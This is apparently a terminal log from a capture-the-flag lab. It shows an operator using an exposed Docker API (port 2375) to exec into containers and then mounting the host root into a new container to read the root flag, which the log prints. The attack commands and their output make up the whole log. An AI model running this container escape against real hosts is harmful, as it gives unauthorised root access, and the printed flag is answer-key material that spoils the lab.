/usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 196.91 seconds ┌──(witty㉿kali)-[~/Downloads] └─$ docker -H 10.10.85.253:2375 ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 49fe455a9681 frontend "/docker-entrypoint.…" 2 years ago Up 2 hours 0.0.0.0:80->80/tcp dockerescapecompose_frontend_1 4b51f5742aad exif-api-dev "./application -Dqua…" 2 years ago Up 2 hours dockerescapecompose_api-dev-backup_1 cb83912607b9 exif-api "./application -Dqua…" 2 years ago Up 2 hours 8080/tcp dockerescapecompose_api_1 548b701caa56 endlessh "/endlessh -v" 2 years ago Up 2 hours 0.0.0.0:22->2222/tcp dockerescapecompose_endlessh_1 ┌──(witty㉿kali)-[~/Downloads] └─$ docker -H 10.10.85.253:2375 images REPOSITORY TAG IMAGE ID CREATED SIZE exif-api-dev latest 4084cb55e1c7 2 years ago 214MB exif-api latest 923c5821b907 2 years ago 163MB frontend latest 577f9da1362e 2 years ago 138MB endlessh latest 7bde5182dc5e 2 years ago 5.67MB nginx latest ae2feff98a0c 2 years ago 133MB debian 10-slim 4a9cd57610d6 2 years ago 69.2MB registry.access.redhat.com/ubi8/ubi-minimal 8.3 7331d26c1fdf 2 years ago 103MB alpine 3.9 78a2ce922f86 2 years ago 5.55MB ┌──(witty㉿kali)-[~/Downloads] └─$ docker -H 10.10.85.253:2375 exec -it cb83912607b9 /bin/bash bash-4.4$ whoami quarkus bash-4.4$ id uid=1000(quarkus) gid=1000(quarkus) groups=1000(quarkus) bash-4.4$ ls application ┌──(witty㉿kali)-[~/Downloads] └─$ docker -H 10.10.85.253:2375 exec -it 49fe455a9681 /bin/bash root@docker-escape:/# id uid=0(root) gid=0(root) groups=0(root) root@docker-escape:/# ls bin dev docker-entrypoint.sh home lib64 mnt proc run srv tmp var boot docker-entrypoint.d etc lib media opt root sbin sys usr root@docker-escape:/# cd root root@docker-escape:~# ls root@docker-escape:~# ls -lah total 16K drwx------ 2 root root 4.0K Dec 9 2020 . drwxr-xr-x 1 root root 4.0K Jan 7 2021 .. -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc -rw-r--r-- 1 root root 148 Aug 17 2015 .profile root@docker-escape:~# cd .. root@docker-escape:/# ls bin dev docker-entrypoint.sh home lib64 mnt proc run srv tmp var boot docker-entrypoint.d etc lib media opt root sbin sys usr root@docker-escape:/# cd mnt root@docker-escape:/mnt# ls root@docker-escape:/mnt# exit exit ┌──(witty㉿kali)-[~/Downloads] └─$ docker -H 10.10.85.253:2375 exec -it 49fe455a9681 /bin/bash root@docker-escape:/# find / -type f -name flag.txt 2>/dev/null root@docker-escape:/# ^C root@docker-escape:/# exit ┌──(witty㉿kali)-[~/Downloads] └─$ docker -H 10.10.85.253:2375 run -it -v /:/mnt/ 78a2ce922f86 /bin/sh / # id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video) / # ls -lah / total 64 drwxr-xr-x 1 root root 4.0K Apr 7 20:54 . drwxr-xr-x 1 root root 4.0K Apr 7 20:54 .. -rwxr-xr-x 1 root root 0 Apr 7 20:54 .dockerenv drwxr-xr-x 2 root root 4.0K Apr 23 2020 bin drwxr-xr-x 5 root root 360 Apr 7 20:54 dev drwxr-xr-x 1 root root 4.0K Apr 7 20:54 etc drwxr-xr-x 2 root root 4.0K Apr 23 2020 home drwxr-xr-x 5 root root 4.0K Apr 23 2020 lib drwxr-xr-x 5 root root 4.0K Apr 23 2020 media drwxr-xr-x 22 root root 4.0K Jan 9 2021 mnt drwxr-xr-x 2 root root 4.0K Apr 23 2020 opt dr-xr-xr-x 96 root root 0 Apr 7 20:54 proc drwx------ 1 root root 4.0K Apr 7 20:54 root drwxr-xr-x 2 root root 4.0K Apr 23 2020 run drwxr-xr-x 2 root root 4.0K Apr 23 2020 sbin drwxr-xr-x 2 root root 4.0K Apr 23 2020 srv dr-xr-xr-x 13 root root 0 Apr 7 20:54 sys drwxrwxrwt 2 root root 4.0K Apr 23 2020 tmp drwxr-xr-x 7 root root 4.0K Apr 23 2020 usr drwxr-xr-x 11 root root 4.0K Apr 23 2020 var / # cd /mnt/root /mnt/root # ls flag.txt /mnt/root # cat flag.txt Congrats, you found the real flag! THM{c62517c0cad93ac93a92b1315a32d734} /mnt/root # cd /;cat .dockerenv /